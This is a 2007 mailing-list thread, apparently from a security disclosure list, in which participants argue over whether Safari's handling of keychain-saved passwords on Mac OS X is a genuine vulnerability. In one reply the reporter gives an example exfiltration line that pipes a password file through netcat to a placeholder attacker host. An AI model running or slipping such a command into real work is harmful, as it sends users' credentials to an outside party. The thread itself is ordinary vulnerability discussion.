Re: Apple Safari on MacOSX may reveal user's saved passwords
On 17 May 2007, at 7:50 PM, graham.coles@xxxxxxxxxxxxxxxxxxx wrote:
It is also why I don't leave my machine logged in and accessible to
other
users, which appears to be the whole basis of this 'vulnerability'.
this is NOT the basis of the vulnerability. The point is that
normally a malicious applications running as a nonroot are not able
to read keychained passwords.
In this case to steal passwords is sufficent to entice the victim to
execute a malicious script, that normally it's not enough since
keychain refuses access to untrusted applications.
This issue exposes keychained password as those are saved in a text
file: an inexperienced user can loose his password by executing an
untrusted malicious shell script (ie "cat /home/pop/pass | nc
steal.com 666")
The whole concept of the keychain, however, is to restrict access
to its
contents to the owner. If you can happily log in as the owner, then
you
have everything they can access, INCLUDING the keychain. If they
can't do
this, you just have some encrypted data. You don't HAVE to store web
passwords, of course.
keychain asks for password when the owner wants to see his data and
having access to a computer doesn't mean that you have the login
password too
If you are sitting at the machine of a person who has left it
logged in
and they use this feature, then whatever web browser you are using
will
believe you are that person and provide access to the website
automatically--you don't need to see the password to use it.
and what if you gain a 5 minutes access to a laptop in the middle of
the desert where internet connection is missing . . .
I'd like to know what Apple were supposed to do to fix this?
i think it's sufficent to untrust the injected code....
It is, after all, YOUR keychain with YOUR passwords that YOU want
applications to recover when YOU are logged in. Why shouldn't YOU
be able
to access it. If you don't want to use it don't, but if someone has
to be
logged in as you to read it, that sounds about right.
right?? it's like having passwords saved in a text file and 'chmod
700' it
Someone has *ROOT* access to your system REMOTELY over ssh and
you're
worried that they might be able to retrieve a password from your
keychain.
rooting a computer is really not the point, it' quite obvious that
"rooted comp" => "TOTAL compromise"
Let me make a question: what if safari makes loaded password part of
the html so it's shown when clicking "view page source" ..?? should
it be considered a vulnerability??
cheers,
-poplix
Yes, it would be annoying if someone rooted my laptop. It would be a
lot more annoying if they not only rooted my laptop but also
cleaned out
my bank account via my browser.
'Annoying' is the understatement of the millennium.
As far as root access goes, see my comments above regarding key
loggers?
With root access they will have your gpg file, they will know what
processes are running (they will know when you run gpg) and they can
capture your keystrokes. Is this then a vulnerability of gpg? So
much for
keeping your online banking safe. Even if you memorize the
passwords, they
can still see your keypresses and thereofre empty your bank account.
If someone roots your machine, security is non-existant and trust
beyond
repair. Don't trivialize this by comparing it to a 'might be able
to see
your web passwords' issue, this is disaster incarnate and game over
all
rolled into one!
It *is* somewhat disturbing that root can so trivially interfere with
the guts of someone else's processes. Normally, root has to do a
lot of
work to do that.
With great power comes great responsibility, which is precisely why
Macs
have the root login disabled and require a user designated as
'Administrator' to authenticate themself whenever system files are
modified or installed. Other users are created as non-administrator
and
remote login is blocked by the firewall. The chances of anyone
actually
logging in remotely as root on a normal Mac are zero as you, while
administrator, would have to specifically enable all of this. This
is why
Apple warn you not to do it.
a different non-root user on the console can do it too
Which again restricts this vunerability (as previously mentioned) to
an
attacker who happens to be sitting in front of your machine(!)
Did you read the bit where I speculated about setuid applications?
Yes, but again if you can get this far you either have the person's
identity or root access (bad or hopeless situation respectively). Why
worry incessantly about things that you stored in the keychain being
accessed when someone can access everything you own.
Should the keychain refuse to divulge its contents to a person
authenticated as the owner?
Is the answer to remove the keychain and watch as people revert to
storing
their passwords unencrypted in stickies, or text files on their
desktop?
You normally have to come up with a feasible attack vector for
something
to be a vulnerability, this seems far too early to be notifying the
vendor.
Saving passwords on any web browser is a lousy idea from a security
perspective. However, people don't like security, they like
convenience.
The only real fix here is perhaps a disclaimer message advising
people not
to store important passwords for websites in the browser in the first
place. But lets face reality, even if the did would it stop people
doing
it?
--
David Cantrell
--
Graham Coles
The Logic Group Enterprises Limited
Logic House, Waterfront Business Park, Fleet Road, Fleet,
Hampshire, GU51 3SB, UK
Registered in England. Registered No. 2609323